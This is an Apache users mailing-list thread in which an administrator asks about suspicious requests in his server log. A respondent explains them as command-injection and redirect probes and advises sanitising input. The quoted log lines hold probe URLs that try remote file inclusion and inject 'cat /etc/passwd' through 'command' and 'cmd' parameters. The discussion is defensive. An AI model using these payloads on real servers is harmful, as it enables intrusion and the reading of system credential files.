because of HTTP Response 302 a safe bet would be to say he didnt get anything still i would recommend you to sanitize the data u get from parameter command and cmd. Also simply go to the url to see what he saw
On Wed, Feb 12, 2014 at 9:58 PM, Knute Johnson <[email protected]>wrote: > On 2/12/2014 08:04, rahul bhola wrote: > >> in first and last casehe was checking if it is possible to pass shell >> commands throught command or cmd parameter.not sure on second one but it >> looks like he was testing for unsanitized url redirection vul. >> >> >> On Wed, Feb 12, 2014 at 9:28 PM, Knute Johnson <[email protected] >> <mailto:[email protected]>> wrote: >> >> I found the following in my log this morning. Does anybody know >> what it really means? Thanks. >> >> A total of 3 possible successful probes were detected (the >> following URLs >> contain strings that match one or more of a listing of strings that >> indicate a possible exploit): >> >> >> /user.php?caselist[bad_file.__txt][path]=http://www.google._ >> _com/humans.txt?&command=cat%__20/etc/passwd >> <http://www.google.com/humans.txt?&command=cat%20/etc/passwd> HTTP >> Response 302 >> >> /sid=__XXXXXXXXXXXXXXXXXXXXXXXXXXXX&__shopid=http://www.google.com/ >> __humans.txt >> <http://www.google.com/humans.txt>? HTTP Response 302 >> >> /gepi/gestion/savebackup.php?__filename=http://www.google.__ >> com/humans.txt?&cmd=cat/etc/__passwd >> >> <http://www.google.com/humans.txt?&cmd=cat/etc/passwd> HTTP Response >> 302 >> >> >> -- >> >> Knute Johnson >> >> ------------------------------__---------------------------- >> --__--------- >> To unsubscribe, e-mail: users-unsubscribe@httpd.__apache.org >> <mailto:[email protected]> >> >> For additional commands, e-mail: [email protected] >> <mailto:[email protected]> >> >> >> >> >> >> -- >> Rahul Bhola >> B.E. >> computers >> Core Member >> Department of backstage >> Bits Pilani KK Birla Goa Campus >> > > So you think he was trying to get the content of my passwd file? So what > would that get him? > > Is it possible to do this myself to see what he could have gotten? > > Thanks, > > > -- > > Knute Johnson > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] > > -- Rahul Bhola B.E. computers Core Member Department of backstage Bits Pilani KK Birla Goa Campus
